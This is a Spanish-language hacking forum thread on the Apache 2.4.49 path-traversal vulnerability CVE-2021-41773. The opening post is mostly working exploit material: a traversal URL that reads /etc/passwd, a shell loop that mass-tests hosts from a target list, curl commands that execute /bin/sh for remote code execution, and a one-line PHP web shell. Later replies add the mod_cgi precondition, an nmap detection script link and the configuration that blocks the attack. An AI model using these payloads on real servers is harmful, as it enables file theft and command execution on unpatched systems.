elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Rompecabezas de Bitcoin, Medio millón USD en premios


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Grave Vulnerabilidad en servidor web Apache 2.4.49 CVE-2021-41773
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Grave Vulnerabilidad en servidor web Apache 2.4.49 CVE-2021-41773  (Leído 7,666 veces)
el-brujo
ehn
***
Desconectado Desconectado

Mensajes: 21.641


La libertad no se suplica, se conquista


Ver Perfil WWW
Grave Vulnerabilidad en servidor web Apache 2.4.49 CVE-2021-41773
« en: 6 Octubre 2021, 12:07 pm »

CVE-2021-41773 POC

La vulnerabilidad sólo funciona con Apache HTTP 2.4.49

Y según Shodan: hay 112,755  Apache Server 2.4.49

Citar
127.0.0.1/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd


Citar
cat targets.txt | while read host do ; do curl --silent --path-as-is --insecure "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" | grep "root:*" && echo "$host \033[0;31mVulnerable\n" || echo "$host \033[0;32mNot Vulnerable\n";done

Citar
curl http://172.18.0.15/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh --data 'echo Content-Type: text/plain; echo; id; uname'
uid=1(daemon) gid=1(daemon) groups=1(daemon)
Linux

Código:
<?php echo system($_GET['c']); ?>


Local file disclosure

Citar


Remote Code Execution

Citar
    $ curl -s --path-as-is -d 'echo Content-Type: text/plain; echo; id' "http://localhost:8080/cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh"

Bug
https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782
« Última modificación: 7 Octubre 2021, 17:11 pm por el-brujo » En línea

WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.606


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: Grave Vulnerabilidad en servidor web Apache 2.4.49 CVE-2021-41773
« Respuesta #1 en: 6 Octubre 2021, 19:12 pm »

Código:
root@x:~#  curl --silent --path-as-is --insecure "127.0.0.1/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
<hr>
<address>Apache/2.4.41 (Ubuntu) Server at 127.0.0.1 Port 80</address>
</body></html>

Creo que no es replicable en ciertas circunstancias, talves deba tener habilitado cgi para eso.
En línea

MCKSys Argentina
Moderador Global
***
Desconectado Desconectado

Mensajes: 5.524


Diviértete crackeando, que para eso estamos!


Ver Perfil
Re: Grave Vulnerabilidad en servidor web Apache 2.4.49 CVE-2021-41773
« Respuesta #2 en: 6 Octubre 2021, 19:36 pm »

Si, necesita CGI enabled: https://github.com/blasty/CVE-2021-41773

EDIT:
RCE: https://twitter.com/wdormann/status/1445676921581228038

Saludos!
« Última modificación: 6 Octubre 2021, 20:15 pm por MCKSys Argentina » En línea

MCKSys Argentina

"Si piensas que algo está bien sólo porque todo el mundo lo cree, no estás pensando."

el-brujo
ehn
***
Desconectado Desconectado

Mensajes: 21.641


La libertad no se suplica, se conquista


Ver Perfil WWW
Re: Grave Vulnerabilidad en servidor web Apache 2.4.49 CVE-2021-41773
« Respuesta #3 en: 7 Octubre 2021, 17:14 pm »

WHK, la vulnerabilidad sólo funciona con Apache HTTP 2.4.49, ninguna otra versión anterior.

módulo habilitado mod_cgi  -->  permite además RCE

MCKSys Argentina y funciona también para Windows como comenta Will Dormann en twitter

https://twitter.com/wdormann/status/1445573881121546245
En línea

WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.606


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: Grave Vulnerabilidad en servidor web Apache 2.4.49 CVE-2021-41773
« Respuesta #4 en: 7 Octubre 2021, 18:59 pm »

Relacionado: https://twitter.com/wdormann/status/1445676921581228038
En línea

el-brujo
ehn
***
Desconectado Desconectado

Mensajes: 21.641


La libertad no se suplica, se conquista


Ver Perfil WWW
Re: Grave Vulnerabilidad en servidor web Apache 2.4.49 CVE-2021-41773
« Respuesta #5 en: 13 Octubre 2021, 11:22 am »

Script NSE para escáner nmap de la vulnerabilidad servidor web Apache 2.4.49
- CVE-2021-41773

https://github.com/RootUp/PersonalStuff/blob/master/http-vuln-cve-2021-41773.nse

 Apache 2.4.49 (CVE-2021-41773) y 2.4.50 (CVE-2021-42013)



- vulnerable:
Código:
<Directory />
  Require all granted
</Directory>

- NOT vulnerable (** DEFAULT **)

Código:
<Directory />
  Require all denied
</Directory>
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Grave vulnerabilidad PHP en modo CGI
PHP
el-brujo 4 5,376 Último mensaje 19 Mayo 2012, 13:36 pm
por squared
Grave vulnerabilidad en la aplicación de SMS de los iPhones
Noticias
el-brujo 0 2,192 Último mensaje 21 Agosto 2012, 18:38 pm
por el-brujo
Grave vulnerabilidad en OS X Yosemite
Noticias
wolfbcn 0 1,988 Último mensaje 5 Noviembre 2014, 01:43 am
por wolfbcn
Servidor Apache apunto a un servidor con IIS pero aparece la IP ¿cómo la quito?
Desarrollo Web
Platanito Mx 3 3,188 Último mensaje 10 Febrero 2016, 16:33 pm
por MinusFour
Vulnerabilidad grave en Nitro PDF Pro
Noticias
wolfbcn 0 3,558 Último mensaje 5 Agosto 2017, 01:44 am
por wolfbcn
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines